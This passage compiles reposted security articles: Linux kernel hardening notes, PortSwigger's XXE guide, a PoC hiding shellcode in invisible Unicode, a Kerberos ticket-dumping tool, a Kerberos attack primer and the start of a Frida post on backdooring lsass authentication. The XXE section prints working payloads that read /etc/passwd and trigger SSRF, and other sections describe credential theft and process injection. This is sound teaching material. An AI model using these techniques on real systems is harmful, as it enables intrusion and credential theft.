May 27, 2019 security things in Linux v5.1 Filed under: Blogging,Chrome OS,Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 8:49 pm Previously: v5.0. Linux kernel v5.1 has been released! Here are some security-related things that stood out to me: introduction of pidfd Christian Brauner landed the first portion of his work to remove pid races from the kernel: using a file descriptor to reference a process (“pidfd”). Now /proc/$pid can be opened and used as an argument for sending signals with the new pidfd_send_signal() syscall. This handle will only refer to the original process at the time the open() happened, and not to any later “reused” pid if the process dies and a new process is assigned the same pid. Using this method, it’s now possible to racelessly send signals to exactly the intended process without having to worry about pid reuse. (BTW, this commit wins the 2019 award for Most Well Documented Commit Log Justification.) explicitly test for userspace mappings of heap memory During Linux Conf AU 2019 Kernel Hardening BoF, Matthew Wilcox noted that there wasn’t anything in the kernel actually sanity-checking when userspace mappings were being applied to kernel heap memory (which would allow attackers to bypass the copy_{to,from}_user() infrastructure). Driver bugs or attackers able to confuse mappings wouldn’t get caught, so he added checks. To quote the commit logs: “It’s never appropriate to map a page allocated by SLAB into userspace” and “Pages which use page_type must never be mapped to userspace as it would destroy their page type”. The latter check almost immediately caught a bad case, which was quickly fixed to avoid page type corruption. LSM stacking: shared security blobs Casey Shaufler has landed one of the major pieces of getting multiple Linux Security Modules (LSMs) running at the same time (called “stacking”). It is now possible for LSMs to share the security-specific storage “blobs”associated with various core structures (e.g. inodes, tasks, etc) that LSMs can use for saving their state (e.g. storing which profile a given task confined under). The kernel originally gave only the single active “major” LSM (e.g. SELinux, Apprmor, etc) full control over the entire blob of storage. With “shared” security blobs, the LSM infrastructure does the allocation and management of the memory, and LSMs use an offset for reading/writing their portion of it. This unblocks the way for “medium sized” LSMs (like SARA and Landlock) to get stacked with a “major” LSM as they need to store much more state than the “minor” LSMs (e.g. Yama, LoadPin) which could already stack because they didn’t need blob storage. SafeSetID LSM Micah Morton added the new SafeSetID LSM, which provides a way to narrow the power associated with the CAP_SETUID capability. Normally a process with CAP_SETUID can become any user on the system, including root, which makes it a meaningless capability to hand out to non-root users in order for them to “drop privileges” to some less powerful user. There are trees of processes under Chrome OS that need to operate under different user IDs and other methods of accomplishing these transitions safely weren’t sufficient. Instead, this provides a way to create a system-wide policy for user ID transitions via setuid() (and group transitions via setgid()) when a process has the CAP_SETUID capability, making it a much more useful capability to hand out to non-root processes that need to make uid or gid transitions. ongoing: refcount_t conversions Elena Reshetova continued landing more refcount_t conversions in core kernel code (e.g. scheduler, futex, perf), with an additional conversion in btrfs from Anand Jain. The existing conversions, mainly when combined with syzkaller, continue to show their utility at finding bugs all over the kernel. ongoing: implicit fall-through removal Gustavo A. R. Silva continued to make progress on marking more implicit fall-through cases. What’s so impressive to me about this work, like refcount_t, is how many bugs it has been finding (see all the “missing break” patches). It really shows how quickly the kernel benefits from adding -Wimplicit-fallthrough to keep this class of bug from ever returning. stack variable initialization includes scalars The structleak gcc plugin (originally ported from PaX) had its “by reference” coverage improved to initialize scalar types as well (making “structleak” a bit of a misnomer: it now stops leaks from more than structs). Barring compiler bugs, this means that all stack variables in the kernel can be initialized before use at function entry. For variables not passed to functions by reference, the -Wuninitialized compiler flag (enabled via -Wall) already makes sure the kernel isn’t building with local-only uninitialized stack variables. And now with CONFIG_GCC_PLUGIN_STRUCTLEAK_BYREF_ALL enabled, all variables passed by reference will be initialized as well. This should eliminate most, if not all, uninitialized stack flaws with very minimal performance cost (for most workloads it is lost in the noise), though it does not have the stack data lifetime reduction benefits of GCC_PLUGIN_STACKLEAK, which wipes the stack at syscall exit. Clang has recently gained similar automatic stack initialization support, and I’d love to this feature in native gcc. To evaluate the coverage of the various stack auto-initialization features, I also wrote regression tests in lib/test_stackinit.c. That’s it for now; please let me know if I missed anything. The v5.2 kernel development cycle is off and running already. © 2019, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License. Sursa: https://outflux.net/blog/archives/2019/05/27/security-things-in-linux-v5-1/
-
Common API security pitfalls This page contains the resources for the talk titled "Common API security pitfalls". A recording is available at the bottom. DOWNLOAD SLIDES Abstract The shift towards an API landscape indicates a significant evolution in the way we build applications. The rise of JavaScript and mobile applications have sparked an explosion of easily-accessible REST APIs. But how do you protect access to your API? Which security aspects are no longer relevant? Which security features are an absolutely must-have, and which additional security measures do you need to take into account? These are hard questions, as evidenced by the deployment of numerous insecure APIs. Attend this session to find out about common API security pitfalls, that often result in compromised user accounts and unauthorized access to your data. We expose the problem that lies at the root of each of these pitfalls, and offer actionable advice to address these security problems. After this session, you will know how to assess the security of your APIs, and the best practices to improve them towards the future. About Philippe De Ryck Philippe De Ryck is the founder of Pragmatic Web Security, where he travels the world to train developers on web security and security engineering. He holds a Ph.D. in web security from KU Leuven. Google recognizes Philippe as a Google Developer Expert for his knowledge of web security and security in Angular applications. Sursa: https://pragmaticwebsecurity.com/talks/commonapisecuritypitfalls
-
XML external entity (XXE) injection In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE injection, and summarize how to prevent XXE injection attacks. What is XML external entity injection? XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access. In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks. How do XXE vulnerabilities arise? Some applications use the XML format to transmit data between the browser and the server. Applications that do this virtually always use a standard library or platform API to process the XML data on the server. XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application. Read more Learn about the XML format, DTDs, and external entities XML external entities are a type of custom XML entity whose defined values are loaded from outside of the DTD in which they are declared. External entities are particularly interesting from a security perspective because they allow an entity to be defined based on the contents of a file path or URL. What are the types of XXE attacks? There are various types of XXE attacks: Exploiting XXE to retrieve files, where an external entity is defined containing the contents of a file, and returned in the application's response. Exploiting XXE to perform SSRF attacks, where an external entity is defined based on a URL to a back-end system. Exploiting blind XXE exfiltrate data out-of-band, where sensitive data is transmitted from the application server to a system that the attacker controls. Exploiting blind XXE to retrieve data via error messages, where the attacker can trigger a parsing error message containing sensitive data. Exploiting XXE to retrieve files To perform an XXE injection attack that retrieves an arbitrary file from the server's filesystem, you need to modify the submitted XML in two ways: Introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file. Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity. For example, suppose a shopping application checks for the stock level of a product by submitting the following XML to the server: <?xml version="1.0" encoding="UTF-8"?> <stockCheck><productId>381</productId></stockCheck> The application performs no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the /etc/passwd file by submitting the following XXE payload: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck><productId>&xxe;</productId></stockCheck> This XXE payload defines an external entity &xxe; whose value is the contents of the /etc/passwd file and uses the entity within the productId value. This causes the application's response to include the contents of the file: Invalid product ID: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin ... Note With real-world XXE vulnerabilities, there will often be a large number of data values within the submitted XML, any one of which might be used within the application's response. To test systematically for XXE vulnerabilities, you will generally need to test each data node in the XML individually, by making use of your defined entity and seeing whether it appears within the response. LABExploiting XXE using external entities to retrieve files Exploiting XXE to perform SSRF attacks Aside from retrieval of sensitive data, the other main impact of XXE attacks is that they can be used to perform server-side request forgery (SSRF). This is a potentially serious vulnerability in which the server-side application can be induced to make HTTP requests to any URL that the server can access. To exploit an XXE vulnerability to perform an SSRF attack, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value. If you can use the defined entity within a data value that is returned in the application's response, then you will be able to view the response from the URL within the application's response, and so gain two-way interaction with the backend system. If not, then you will only be able to perform blind SSRF attacks (which can still have critical consequences). In the following XXE example, the external entity will cause the server to make a back-end HTTP request to an internal system within the organization's infrastructure: <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]> LABExploiting XXE to perform SSRF attacks Blind XXE vulnerabilities Many instances of XXE vulnerabilities are blind. This means that the application does not return the values of any defined external entities in its responses, and so direct retrieval of server-side files is not possible. Blind XXE vulnerabilities can still be detected and exploited, but more advanced techniques are required. You can sometimes use out-of-band techniques to find vulnerabilities and exploit them to exfiltrate data. And you can sometimes trigger XML parsing errors that lead to disclosure of sensitive data within error messages. Read more Finding and exploiting blind XXE vulnerabilities Finding hidden attack surface for XXE injection Attack surface for XXE injection vulnerabilities is obvious in many cases, because the application's normal HTTP traffic includes requests that contain data in XML format. In other cases, the attack surface is less visible. However, if you look in the right places, you will find XXE attack surface in requests that do not contain any XML. XInclude attacks Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed into a backend SOAP request, which is then processed by the backend SOAP service. In this situation, you cannot carry out a classic XXE attack, because you don't control the entire XML document and so cannot define or modify a DOCTYPE element. However, you might be able to use XInclude instead. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document. To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example: <foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text" href="file:///etc/passwd"/></foo> LABExploiting XInclude to retrieve files XXE attacks via file upload Some applications allow users to upload files which are then processed server-side. Some common file formats use XML or contain XML subcomponents. Examples of XML-based formats are office document formats like DOCX and image formats like SVG. For example, an application might allow users to upload images, and process or validate these on the server after they are uploaded. Even if the application expects to receive a format like PNG or JPEG, the image processing library that is being used might support SVG images. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities. LABExploiting XXE via image file upload XXE attacks via modified content type Most POST requests use a default content type that is generated by HTML forms, such as application/x-www-form-urlencoded. Some web sites expect to receive requests in this format but will tolerate other content types, including XML. For example, if a normal request contains the following: POST /action HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 7 foo=bar Then you might be able submit the following request, with the same result: POST /action HTTP/1.0 Content-Type: text/xml Content-Length: 52 <?xml version="1.0" encoding="UTF-8"?><foo>bar</foo> If the application tolerates requests containing XML in the message body, and parses the body content as XML, then you can reach the hidden XXE attack surface simply by reformatting requests to use the XML format. How to find and test for XXE vulnerabilities The vast majority of XXE vulnerabilities can be found quickly and reliably using Burp Suite's web vulnerability scanner. Manually testing for XXE vulnerabilities generally involves: Testing for file retrieval by defining an external entity based on a well-known operating system file and using that entity in data that is returned in the application's response. Testing for blind XXE vulnerabilities by defining an external entity based on a URL to a system that you control, and monitoring for interactions with that system. Burp Collaborator client is perfect for this purpose. Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack to try to retrieve a well-known operating system file. How to prevent XXE vulnerabilities Virtually all XXE vulnerabilities arise because the application's XML parsing library supports potentially dangerous XML features that the application does not need or intend to use. The easiest and most effective way to prevent XXE attacks is to disable those features. Generally, it is sufficient to disable resolution of external entities and disable support for XInclude. This can usually be done via configuration options or by programmatically overriding default behavior. Consult the documentation for your XML parsing library or API for details about how to disable unnecessary capabilities. Sursa: https://portswigger.net/web-security/xxe
-
PoC: Encoding Shellcode Into Invisible Unicode Characters Malware has been using unicode since time ago, to hide / obfuscate urls, filenames, scripts, etc... Right-to-left Override character (e2 80 ae) is a classic. In this post a PoC is shared, where a shellcode is hidden / encoded into a string in a python script (probably this would work with other languages too), with invisible unicode characers that will not be displayed by the most of the text editors. The idea is quite simple. We will choose three "invisible" unicode characters: e2 80 8b : bit 0 e2 80 8c : bit 1 e2 80 8d : delimiter With this, and having a potentially malicious script, we can encode the malicious script, bit by bit, into these unicode characters: (delimiter e2 80 8d) .....encoded script (bit 0 to e2 80 8b, bit 1 to e2 80 8c)...... (delimiter e2 80 8d) I have used this simple script to encode the malicious script: https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/encode.py Now, we can embbed this encoded "invisible" unicode chars into a string. The following source code looks like a simple hello world: https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/helloworld.py However, if you download and open the file with an hexadecimal editor you can see all that encoded information that is part of the hello world string: Most of the text editors that I tested didn't display the unicode characters: Visual Studio, Geany, Sublime, Notepad, browsers, etc... The following script decodes and executes a secondary potentially malicious python script (the PoC script only executes calc) from invisible unicode characters: https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/malicious.py And the following script decodes a x64 shellcode (the shellcode executes calc) from invisible unicode characters, then it loads the shellcode with VirtualAlloc+WriteProtectMemory, and calls CreateThread to execute it: https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/malicious2_x64_shellcode.py The previous scripts are quite obvious and suspicious, but if this encoded malicious script and these lines are mixed into a longer and more complicated source code, probably it would be harder to notice the script contains malicious code. So, careful when you download your favorite exploits! I have not tested it, but probably this will work with other languanges. Visual Studio for example, doesn't show this characters into a C source code. Posted by vallejocc at 2:47 AM Sursa: http://www.vallejo.cc/2019/05/poc-encrypting-malicious-script-into.html
-
Tickey Tool to extract Kerberos tickets from Linux kernel keys. Based in the paper Kerberos Credential Thievery (GNU/Linux). Building git clone https://github.com/TarlogicSecurity/tickey cd tickey/tickey make CONF=Release After that, binary should be in dist/Release/GNU-Linux/. Execution Arguments: -i => To perform process injection if it is needed -s => To not print in output (for injection) Important: when injects in another process, tickey performs an execve syscall which invocates its own binary from the context of another user. Therefore, to perform a successful injection, the binary must be in a folder which all users have access, like /tmp. Execution example: [root@Lab-LSV01 /]# /tmp/tickey -i [*] krb5 ccache_name = KEYRING:session:sess_%{uid} [+] root detected, so... DUMP ALL THE TICKETS!! [*] Trying to inject in tarlogic[1000] session... [+] Successful injection at process 25723 of tarlogic[1000],look for tickets in /tmp/__krb_1000.ccache [*] Trying to inject in velociraptor[1120601115] session... [+] Successful injection at process 25794 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache [*] Trying to inject in trex[1120601113] session... [+] Successful injection at process 25820 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache [X] [uid:0] Error retrieving tickets License This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details. You should have received a copy of the GNU Affero General Public License along with this program. If not, see https://www.gnu.org/licenses/. Author Eloy Pérez González @Zer1t0 at @Tarlogic - https://www.tarlogic.com/en/ Acknowledgment Thanks to @TheXC3LL for his support with the binary injection. Sursa: https://github.com/TarlogicSecurity/tickey
-
Kerberos (I): How does Kerberos work? – Theory 20 - MAR - 2019 - ELOY PÉREZ The objective of this series of posts is to clarify how Kerberos works, more than just introduce the attacks. This due to the fact that in many occasions it is not clear why some techniques works or not. Having this knowledge allows to know when to use any of those attacks in a pentest. Therefore, after a long journey of diving into the documentation and several posts about the topic, we’ve tried to write in this post all the important details which an auditor should know in order to understand how take advantage of Kerberos protocol. In this first post only basic functionality will be discussed. In later posts it will see how perform the attacks and how the more complex aspects works, as delegation. If you have any doubt about the topic which it is not well explained, do not be afraid on leave a comment or question about it. Now, onto the topic. What is Kerberos? Firstly, Kerberos is an authentication protocol, not authorization. In other words, it allows to identify each user, who provides a secret password, however, it does not validates to which resources or services can this user access. Kerberos is used in Active Directory. In this platform, Kerberos provides information about the privileges of each user, but it is responsability of each service to determine if the user has access to its resources. Kerberos items In this section several components of Kerberos environment will be studied. Transport layer Kerberos uses either UDP or TCP as transport protocol, which sends data in cleartext. Due to this Kerberos is responsible for providing encryption. Ports used by Kerberos are UDP/88 and TCP/88, which should be listen in KDC (explained in next section). Agents Several agents work together to provide authentication in Kerberos. These are the following: Client or user who wants to access to the service. AP (Application Server) which offers the service required by the user. KDC (Key Distribution Center), the main service of Kerberos, responsible of issuing the tickets, installed on the DC (Domain Controller). It is supported by the AS (Authentication Service), which issues the TGTs. Encryption keys There are several structures handled by Kerberos, as tickets. Many of those structures are encrypted or signed in order to prevent being tampered by third parties. These keys are the following: KDC or krbtgt key which is derivate from krbtgt account NTLM hash. User key which is derivate from user NTLM hash. Service key which is derivate from the NTLM hash of service owner, which can be an user or computer account. Session key which is negotiated between the user and KDC. Service session key to be use between user and service. Tickets The main structures handled by Kerberos are the tickets. These tickets are delivered to the users in order to be used by them to perform several actions in the Kerberos realm. There are 2 types: The TGS (Ticket Granting Service) is the ticket which user can use to authenticate against a service. It is encrypted with the service key. The TGT (Ticket Granting Ticket) is the ticket presented to the KDC to request for TGSs. It is encrypted with the KDC key. PAC The PAC (Privilege Attribute Certificate) is an structure included in almost every ticket. This structure contains the privileges of the user and it is signed with the KDC key. It is possible to services to verify the PAC by comunicating with the KDC, although this does not happens often. Nevertheless, the PAC verification consists of checking only its signature, without inspecting if privileges inside of PAC are correct. Furthermore, a client can avoid the inclusion of the PAC inside the ticket by specifying it in KERB-PA-PAC-REQUEST field of ticket request. Messages Kerberos uses differents kinds of messages. The most interesting are the following: KRB_AS_REQ: Used to request the TGT to KDC. KRB_AS_REP: Used to deliver the TGT by KDC. KRB_TGS_REQ: Used to request the TGS to KDC, using the TGT. KRB_TGS_REP: Used to deliver the TGS by KDC. KRB_AP_REQ: Used to authenticate a user against a service, using the TGS. KRB_AP_REP: (Optional) Used by service to identify itself against the user. KRB_ERROR: Message to comunicate error conditions. Additionally, even if it is not part of Kerberos, but NRPC, the AP optionally could use the KERB_VERIFY_PAC_REQUEST message to send to KDC the signature of PAC, and verify if it is correct. Below is shown a summary of message sequency to perform authentication: Kerberos messages summary Authentication process In this section, the sequency of messages to perform authentication will be studied, starting from a user without tickets, up to being authenticated against the desired service. KRB_AS_REQ Firstly, user must get a TGT from KDC. To achieve this, a KRB_AS_REQ must be sent: KRB_AS_REQ schema message KRB_AS_REQ has, among others, the following fields: A encrypted timestamp with client key, to authenticate user and prevent replay attacks Username of authenticated user The service SPN asociated with krbtgt account A Nonce generated by the user Note: the encrypted timestamp is only necessary if user requires preauthentication, which is common, except if DONT_REQ_PREAUTH flag is set in user account. KRB_AS_REP After receiving the request, the KDC verifies the user identity by decrypting the timestamp. If the message is correct, then it must respond with a KRB_AS_REP: KRB_AS_REP schema message KRB_AS_REP includes the next information: Username TGT, which includes: Username Session key Expiration date of TGT PAC with user privileges, signed by KDC Some encrypted data with user key, which includes: Session key Expiration date of TGT User nonce, to prevent replay attacks Once finished, user already has the TGT, which can be used to request TGSs, and afterwards access to the services. KRB_TGS_REQ In order to request a TGS, a KRB_TGS_REQ message must be sent to KDC: KRB_TGS_REQ schema message KRB_TGS_REQ includes: Encrypted data with session key: Username Timestamp TGT SPN of requested service Nonce generated by user KRB_TGS_REP After receiving the KRB_TGS_REQ message, the KDC returns a TGS inside of KRB_TGS_REP: KRB_TGS_REP schema message KRB_TGS_REP includes: Username TGS, which contains: Service session key Username Expiration date of TGS PAC with user privileges, signed by KDC Encrypted data with session key: Service session key Expiration date of TGS User nonce, to prevent replay attacks KRB_AP_REQ To finish, if everything went well, the user already has a valid TGS to interact with service. In order to use it, user must send to the AP a KRB_AP_REQ message: KRB_AP_REQ schema message KRB_AP_REQ includes: TGS Encrypted data with service session key: Username Timestamp, to avoid replay attacks After that, if user privileges are rigth, this can access to service. If is the case, which not usually happens, the AP will verify the PAC against the KDC. And also, if mutual authentication is needed it will respond to user with a KRB_AP_REP message. Attacks Based on previous explained authentication process the attacks oriented to compromise Active Directory will be explained in this section. Overpass The Hash/Pass The Key (PTK) The popular Pass The Hash (PTH) attack consist in using the user hash to impersonate the specific user. In the context of Kerberos this is known as Overpass The Hash o Pass The Key. If an attacker gets the hash of any user, he could impersonate him against the KDC and then gain access to several services. User hashes can be extracted from SAM files in workstations or NTDS.DIT file of DCs, as well as from the lsass process memory (by using Mimikatz) where it is also possible to find cleartext passwords. Pass The Ticket (PTT) Pass The Ticket technique is about getting an user ticket and use it to impersonate that user. However, besides the ticket, it is necessary obtain the session key too in order to use the ticket. It is possible obtain the ticket performing a Man-In-The-Middle attack, due to the fact that Kerberos is sent over TCP or UDP. However, this techniques does not allow get access to session key. An alternative is getting the ticket from lsass process memory, where also reside the session key. This procediment could be performed with Mimikatz. It is better to obtain a TGT, due to TGS only can be used against one service. Also, it should be taken into account that the lifetime of tickets is 10 hours, after that they are unusable. Golden Ticket and Silver Ticket The objective of Golden Ticket is to build a TGT. In this regard, it is necessary to obtain the NTLM hash of krbtgt account. Once that is obtained, a TGT with custom user and privileges can be built. Moreover, even if user changes his password, the ticket still will be valid. The TGT only can be invalidate if this expires or krbtgt account changes its password. Silver Ticket is similar, however, the built ticket is a TGS this time. In this case the service key is required, which is derived from service owner account. Nevertheless, it is not possible to sign correctly the PAC without krbtgt key. Therefore, if the service verifies the PAC, then this technique will not work. Kerberoasting Kerberoasting is a technique which takes advantage of TGS to crack the user accounts passwords offline. As seen above, TGS comes encrypted with service key, which is derived from service owner account NTLM hash. Usually the owners of services are the computers in which the services are being executed. However, the computer passwords are very complex, thus, it is not useful to try to crack those. This also happens in case of krbtgt account, therefore, TGT is not crackable neither. All the same, on some occasions the owner of service is a normal user account. In these cases it is more feasible to crack their passwords. Moreover, this sort of accounts normally have very juicy privileges. Additionally, to get a TGS for any service only a normal domain account is needed, due to Kerberos not perform authorization checks. ASREPRoast ASREPRoast is similar to Kerberoasting, that also pursues the accounts passwords cracking. If the attribute DONT_REQ_PREAUTH is set in a user account, then it is possible to built a KRB_AS_REQ message without specifying its password. After that, the KDC will respond with a KRB_AS_REP message, which will contain some information encrypted with the user key. Thus, this message can be used to crack the user password. Conclusion In this first post the Kerberos authentication process has been studied and the attacks has been also introduced. The following posts will show how to perform these attacks in a practical way and also how delegation works. I really hope that this post it helps to understand some of the more abstract concepts of Kerberos. References Kerberos v5 RFC: https://tools.ietf.org/html/rfc4120 [MS-KILE] – Kerberos extension: https://msdn.microsoft.com/en-us/library/cc233855.aspx [MS-APDS] – Authentication Protocol Domain Support: https://msdn.microsoft.com/en-us/library/cc223948.aspx Mimikatz and Active Directory Kerberos Attacks: https://adsecurity.org/?p=556 Explain like I’m 5: Kerberos: https://www.roguelynn.com/words/explain-like-im-5-kerberos/ Kerberos & KRBTGT: https://adsecurity.org/?p=483 Mastering Windows Network Forensics and Investigation, 2 Edition . Autores: S. Anson , S. Bunting, R. Johnson y S. Pearson. Editorial Sibex. Active Directory , 5 Edition. Autores: B. Desmond, J. Richards, R. Allen y A.G. Lowe-Norris Service Principal Names: https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85).aspx Niveles funcionales de Active Directory: https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0 OverPass The Hash – Gentilkiwi Blog: https://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash Pass The Ticket – Gentilkiwi Blog: https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos Golden Ticket – Gentilkiwi Blog: https://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos Mimikatz Golden Ticket Walkthrough: https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Golden_Ticket_Walkthrough.html Attacking Kerberos: Kicking the Guard Dog of Hades: https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf Kerberoasting – Part 1: https://room362.com/post/2016/kerberoast-pt1/ Kerberoasting – Part 2: https://room362.com/post/2016/kerberoast-pt2/ Roasting AS-REPs: https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/ PAC Validation: https://passing-the-hash.blogspot.com.es/2014/09/pac-validation-20-minute-rule-and.html Understanding PAC Validation: https://blogs.msdn.microsoft.com/openspecification/2009/04/24/understanding-microsoft-kerberos-pac-validation/ Reset the krbtgt acoount password/keys: https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51 Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft: https://www.microsoft.com/en-us/download/details.aspx?id=36036 Fun with LDAP, Kerberos (and MSRPC) in AD Environments: https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58 Sursa: https://www.tarlogic.com/en/blog/how-kerberos-works/
-
recreating known universal windows password backdoors with Frida Reading time ~20 min Posted by leon on 23 April 2019 Categories: Backdoor, Frida, Lsass, Windows, Password tl;dr I have been actively using Frida for little over a year now, but primarily on mobile devices while building the objectiontoolkit. My interest in using it on other platforms has been growing, and I decided to play with it on Windows to get a feel. I needed an objective, and decided to try port a well-known local Windows password backdoor to Frida. This post is mostly about the process of how Frida will let you quickly investigate and prototype using dynamic instrumentation. the setup Before I could do anything, I had to install and configure Frida. I used the standard Python-based Frida environment as this includes tooling for really easy, rapid development. I just had to install a Python distribution on Windows, followed by a pip install frida frida-tools. With Frida configured, the next question was what to target? Given that anything passwords related is usually interesting, I decided on the Windows Local Security Authority Subsystem Service (lsass.exe). I knew there was a lot of existing knowledge that could be referenced for lsass, especially when considering projects such as Mimikatz, but decided to venture down the path of discovery alone. I figured I’d start by attaching Frida to lsass.exe and enumerate the process a little. Currently loaded modules and any module exports were of interest to me. I started by simply typing frida lsass.exeto attach to the process from an elevated command prompt (Runas Administrator -> accept UAC prompt), and failed pretty hard: RtlCreateUserThread returned 0xc0000022 Running Frida from a PowerShell prompt worked fine though: Frida attached to lsass.exe Turns out, SeDebugPrivilege was not granted by default for the command prompt in my Windows 10 installation, but was when invoking PowerShell. SeDebugPrivilege disabled in an Administrator command prompt With that out of the way, lets write some scripts to enumerate lsass! I started simple, with only a Process.enumerateModules() call, iterating the results and printing the module name. This would tell me which modules were currently loaded in lsass. lsass module enumeration Some Googling of the loaded DLL’s, as well as exports enumeration had me focus on the msv1_0.DLL Authentication Package first. This authentication package was described as the one responsible for local machine logons, and a prime candidate for our shenanigans. Frida has a utility called frida-trace (part of the frida-tools package) which could be used to “trace” function calls within a DLL. So, I went ahead and traced the msv1_0.dll DLL while performing a local interactive login using runas. msv1_0.dll exports, viewed in IDA Free frida-trace output for the msv1_0.dll when performing two local, interactive authentication actions As you can see, frida-trace makes it suuuuuper simple to get a quick idea of what may be happening under the hood, showing a flow of LsaApCallPackageUntrusted() -> MsvSamValidate(), followed by two LsaApLogonTerminated() calls when I invoke runas /user:user cmd. Without studying the function prototype for MsvSamValidate(), I decided to take a look at what the return values would be for the function (if any) with a simple log(retval) statement in the onLeave() function. This function was part of the autogenerated handlers that frida-trace creates for any matched methods it should trace, dumping a small JavaScript snippet in the __handlers__ directory. MsvValidate return values A naive assumption at this stage was that if the supplied credentials were incorrect, MsvSamValidate() would simply return a non NULL value (which may be an error code or something). The hook does not consider what the method is actuallydoing (or that there may be further function calls that may be more interesting), especially in the case of valid authentication, but, I figured I will give overriding the return value even if an invalid set of credentials were supplied a shot. Editing the handler generated by frida-trace, I added a retval.replace(0x0) statement to the onLeave() method, and tried to auth… One dead Windows Computer Turns out, LSASS is not that forgiving when you tamper with its internals I had no expectation that this was going to work, but, it proved an interesting exercise nonetheless. From here, I had to resort to actually understanding MsvSamValidate()before I could get anything useful done with it. backdoor – approach #1 Playing with MsvSamValidate() did not yield much in terms of an interesting hook, but researching LSASS and Authentication Packages online lead me to this article which described a “universal” password backdoor for any local Windows account. I figured this may be an interesting one to look at, and so a new script began that focussed on RtlCompareMemory. According to the article, RtlCompareMemory would be called to finally compare the MD4 value from a local SAM database with a calculated MD4 of a provided password. The blog post also included some sample code to demonstrate the backdoor, which implements a hardcoded password to trigger a successful authentication scenario. From the MSDN docs, RtlCompareMemory takes three arguments where the first two are pointers. The third argument is a count for the number of bytes to compare. The function would simply return a value indicating how many bytes from the two blocks of memory were the same. In the case of an MD4 comparison, if 16 bytes were the same, then the two blocks will be considered the same, and the RtlCompareMemory function will return 0x10. To understand how RtlCompareMemory was used from an LSASS perspective, I decided to use frida-trace to visualise invocations of the function. This was a really cheap attempt considering that I knew this specific function was interesting. I did not have to find out which DLL’s may have this function or anything, frida-trace does all of that for us after simply specifying the name target function name. Unfiltered RltCompareMemory invocations from within lsass.exe The RtlCompareMemroy function was resolved in both Kernel32.dll as well as in ntdll.dll. I focused on ntdll.dll, but it turns out it could work with either. Upon invocation, without even attempting to authenticate to anything, the output was racing past in the terminal making it impossible to follow (as you can see by the “ms” readings in the above screenshot). I needed to get the output filtered, showing only the relevant invocations. The first question I had was: “Are these calls from kernel32 or ntdll?”, so I added a module string to the autogenerated frida-trace handler to distinguish the two. Module information added to log() calls Running the modified handlers, I noticed that the RtlCompareMemory function in both modules were being called, every time. Interesting. Next, I decided to log the lengths that were being compared. Maybe there is a difference? Remember, RtlCompareMemory receives a third argument for the length, so we could just dump that value from memory. RtlCompareMemory size argument dumping So even the size was the same for the RtlCompareMemory calls in both of the identified modules. At this stage, I decided to focus on the function in ntdll.dll, and ignore the kernel32.dll module for now. I also dumped the bytes to screen of what was being compared so that I could get some indication of the data that was being compared. Frida has a hexdumphelper specifically for this! RtlCompareMemory block contents I observed the output for a while to see if I could spot any patterns, especially while performing authentication. The password for the user account I configured was… password, and eventually, I spotted it as one of the blocks RtlCompareMemory had to compare. ASCII, NULL padded password spotted as one of the memory blocks used in RtlCompareMemory I also noticed that many different block sizes were being compared using RtlCompareMemroy. As the local Windows SAM database stores the password for an account as an MD4 hash, these hashes could be represented as 16 bytes in memory. As RtlCompareMemory gets the length of bytes to compare, I decided to just filter the output to only report where 16 bytes were to be compared. This 